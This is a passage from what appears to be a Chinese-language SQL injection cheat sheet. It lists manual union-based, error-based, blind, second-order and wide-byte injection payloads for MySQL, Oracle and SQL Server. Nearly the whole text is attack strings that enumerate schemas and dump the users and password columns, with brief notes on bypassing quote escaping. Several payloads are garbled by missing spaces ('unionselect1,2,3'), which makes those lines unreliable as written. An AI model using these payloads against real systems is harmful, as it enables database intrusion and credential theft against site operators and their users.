?id=1' order by 4--+ ?id=0'unionselect1,2,3,database()--+ ?id=0' union select 1,2,3,group_concat(table_name) from information_schema.tables where table_schema=database() --+ ?id=0'unionselect1,2,3,group_concat(column_name) from information_schema.columns where table_name="users" --+ #group_concat(column_name) 可替换为 unhex(Hex(cast(column_name+as+char)))column_name
?id=0' union select 1,2,3,group_concat(password) from users --+ #group_concat 可替换为 concat_ws(',',id,users,password )
?id=0'unionselect1,2,3,password from users limit 0,1--+
1.2 报错注入
1.floor()
select*from test where id=1and (select1from (selectcount(*),concat(user(),floor(rand(0)*2))x from information_schema.tables groupby x)a);
2.extractvalue()
select*from test where id=1and (extractvalue(1,concat(0x7e,(selectuser()),0x7e)));
3.updatexml()
select*from test where id=1and (updatexml(1,concat(0x7e,(selectuser()),0x7e),1));
4.geometrycollection()(5.1 <= version <= 5.5.48 )
select*from test where id=1and geometrycollection((select*from(select*from(select database())a)b));
5.multipoint()(5.1 <= version <= 5.5.48 )
select*from test where id=1and multipoint((select*from(select*from(selectuser())a)b));
6.polygon()(5.1 <= version <= 5.5.48 )
select*from test where id=1and polygon((select*from(select*from(selectuser())a)b));
7.multipolygon()(5.1 <= version <= 5.5.48 )
select*from test where id=1and multipolygon((select*from(select*from(selectuser())a)b));
8.linestring()(5.1 <= version <= 5.5.48 )
select*from test where id=1and linestring((select*from(select*from(selectuser())a)b));
9.multilinestring()(5.1 <= version <= 5.5.48 )
select*from test where id=1and multilinestring((select*from(select*from(selectuser())a)b));
10.exp()(5.1 <= version <= 5.5.48 )
select*from test where id=1andexp(~(select*from(selectuser())a));
爆库:?id=1' and updatexml(1,(select concat(0x7e,(schema_name),0x7e) from information_schema.schemata limit 2,1),1) -- + 爆表:?id=1' and updatexml(1,(select concat(0x7e,(table_name),0x7e) from information_schema.tables where table_schema='security' limit 3,1),1) -- + 爆字段:?id=1' and updatexml(1,(select concat(0x7e,(column_name),0x7e) from information_schema.columns where table_name=0x7573657273 limit 2,1),1) -- + 爆数据:?id=1' and updatexml(1,(select concat(0x7e,password,0x7e) from users limit 1,1),1) -- +
#concat 也可以放在外面 updatexml(1,concat(0x7e,(select password from users limit 1,1),0x7e),1)
mysql> select * from admin; +—-+———–+——-+ | id | name | pass | +—-+———–+——-+ | 1 | admin | admin | | 2 | admin’111 | 11111 | | 3 | admin’–+ | 11 | +—-+———–+——-+ 4 rows in set (0.00 sec) 二次注入在没有源码的情况下比较难发现,通常见于注册、登录恶意账户之后,数据库可能会因为恶意账户名的问题,将 admin’–+ 误认为 admin 账户
宽字节注入:针对目标做了一定的防护,单引号被转义为 \' , mysql 会将 \ 编码为 %5c ,宽字节中两个字节代表一个汉字,所以把 %df 加上 %5c 就变成了一个汉字“運”,使用这种方法成功绕过转义,就是所谓的宽字节注入 id=-1%df’ union select…
没使用宽字节 %27 -> %5C%27
使用宽字节 %df%27 -> %df%5c%27 -> 運’
0x02 Oracle 手工注入
2.1 联合注入
?id=-1' union select user,null from dual-- ?id=-1'unionselect version,nullfrom v$instance-- ?id=-1' union select table_name,null from (select * from (select rownum as limit,table_name from user_tables) where limit=3)-- ?id=-1'unionselect column_name,nullfrom (select*from (select rownum as limit,column_name from user_tab_columns where table_name ='USERS') where limit=2)-- ?id=-1' union select username,passwd from users-- ?id=-1'unionselect username,passwd from (select*from (select username,passwd,rownum as limit from users) where limit=3)--
2.2 报错注入
?id=1' and 1=ctxsys.drithsx.sn(1,(select user from dual))-- ?id=1'and1=ctxsys.drithsx.sn(1,(select banner from v$version where banner like'Oracle%))-- ?id=1'and1=ctxsys.drithsx.sn(1,(select table_name from (select rownum as limit,table_name from user_tables) where limit=3))-- ?id=1' and 1=ctxsys.drithsx.sn(1,(select column_name from (select rownum as limit,column_name from user_tab_columns where table_name ='USERS') where limit=3))-- ?id=1'and1=ctxsys.drithsx.sn(1,(select passwd from (select passwd,rownum as limit from users) where limit=1))-
2.3 盲注
2.3.1 布尔盲注
既然是盲注,那么肯定涉及到条件判断语句,Oracle 除了使用 IF…THEN…ELSE…END IF 这种较复杂的写法,还可以使用 decode() 函数。 语法:decode(条件,值1,返回值1,值2,返回值2,…值n,返回值n,缺省值);
该函数的含义如下: IF 条件=值1 THEN RETURN(返回值1) ELSIF 条件=值2 THEN RETURN(返回值2) …… ELSIF 条件=值n THEN RETURN(返回值n) ELSE RETURN(缺省值) END IF ?id=1’ and 1=(select decode(user,’SYSTEM’,1,0,0) from dual)– ?id=1’ and 1=(select decode(substr(user,1,1),’S’,1,0,0) from dual)– ?id=1’ and ascii(substr(user,1,1))> 64– #二分法
?id=1' and 1=(case when ascii(substr(user,1,1))> 128 then DBMS_PIPE.RECEIVE_MESSAGE('a',5) else 1 end)-- ?id=1' and 1=(case when ascii(substr(user,1,1))> 64 then DBMS_PIPE.RECEIVE_MESSAGE('a',5) else 1 end)--
0x03 SQL server 手工注入
3.1 联合注入
?id=-1' union select null,null-- ?id=-1'unionselect @@servername, @@version-- ?id=-1' union select db_name(),suser_sname()-- ?id=-1'unionselect (select top 1 name from sys.databases where name notin (select top 6 name from sys.databases)),null-- ?id=-1' union select (select top 1 name from sys.databases where name not in (select top 7 name from sys.databasesl),null-- ?id--1'unionselect (select top 1 table_ name from information_schema.tables where table_name notin (select top 0 table_name from information_schema.tables)),null-- ?id=-1' union select (select top 1 column name from information_schema.columns where table_name='users' and column_name not in (select top 1 column_name from information_schema.columns where table_name = 'users')),null--- ?id=-1'unionselect (select top 1 username from users where username notin (select top 3 username from users)),null--
3.2 报错注入
?id=1' and 1=(select 1/@@servername)-- ?id=1' and 1=(select 1/(select top 1 name from sys.databases where name not in (select top 1 name from sys.databases))--
3.3 盲注
3.3.1 布尔盲注
?id=1' and ascii(substring((select db_ name(1)),1,1))> 64--